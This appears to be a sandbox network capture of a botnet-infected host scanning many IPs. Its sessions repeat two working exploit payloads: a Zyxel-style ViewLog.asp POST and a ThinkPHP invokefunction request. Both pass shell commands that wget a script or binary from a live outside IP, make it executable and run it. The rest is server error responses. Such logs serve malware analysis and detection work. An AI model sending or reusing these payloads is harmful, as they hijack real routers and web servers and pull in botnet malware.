                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              181192.168.2.233676294.122.126.1758080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:36.198671103 CET4553OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              182192.168.2.235228095.86.125.198080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:36.230496883 CET4554OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              183192.168.2.235463085.253.217.1728080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:36.523494959 CET4559OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              184192.168.2.235087494.121.189.2228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:36.549480915 CET4559OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              185192.168.2.235664495.95.90.948080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:36.568882942 CET4561OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:36.915079117 CET4666INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:37 GMT
                                                              Server: Apache
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 33 30 32 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 302 Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              186192.168.2.234457488.201.164.23280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:36.722637892 CET4571OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:37.106700897 CET4669INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              187192.168.2.234282488.221.128.5080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:37.377140045 CET4676OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:37.700999022 CET4691INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:18:37 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:37 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 32 38 30 64 64 35 38 26 23 34 36 3b 31 36 39 39 39 31 30 33 31 37 26 23 34 36 3b 34 37 38 32 64 66 64 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3280dd58&#46;1699910317&#46;4782dfd9</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              188192.168.2.234544888.218.192.3380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:37.380784988 CET4677OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:38.745662928 CET4813INHTTP/1.1 302 Found
                                                              Date: Mon, 13 Nov 2023 21:18:37 GMT
                                                              Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
                                                              X-Powered-By: PHP/5.4.45
                                                              Location: https://0l.si/index.php?do=login
                                                              Content-Length: 0
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/html


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              189192.168.2.234854088.248.143.7880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:37.589761972 CET4678OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:37.954444885 CET4784INHTTP/1.1 505 HTTP Version not supported
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 140
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              19192.168.2.235635685.174.227.1438080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:03.125050068 CET657OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              190192.168.2.233598088.221.251.24280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:37.693226099 CET4690OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:38.157653093 CET4788INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:18:37 GMT
                                                              Date: Mon, 13 Nov 2023 21:18:37 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 65 30 39 30 65 63 34 26 23 34 36 3b 31 36 39 39 39 31 30 33 31 37 26 23 34 36 3b 61 36 39 66 33 30 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2e090ec4&#46;1699910317&#46;a69f303</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              191192.168.2.233395431.136.132.2448080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.237833977 CET4791OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:39.248513937 CET4913OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:41.264247894 CET5156OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:45.327625036 CET5632OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:53.518546104 CET6620OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:09.644484043 CET8613OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:42.664165974 CET12623OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              192192.168.2.234090462.29.9.578080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.253796101 CET4793OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              193192.168.2.235908694.120.161.1768080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.253963947 CET4794OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              194192.168.2.235215894.121.181.1158080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.254122972 CET4794OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              195192.168.2.235325262.29.76.268080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.254462004 CET4795OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              196192.168.2.234547895.179.211.5080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.429270029 CET4797OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:38.720525980 CET4803INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              197192.168.2.234477895.168.211.5180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:38.450778961 CET4798OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:38.763791084 CET4835INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:38 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
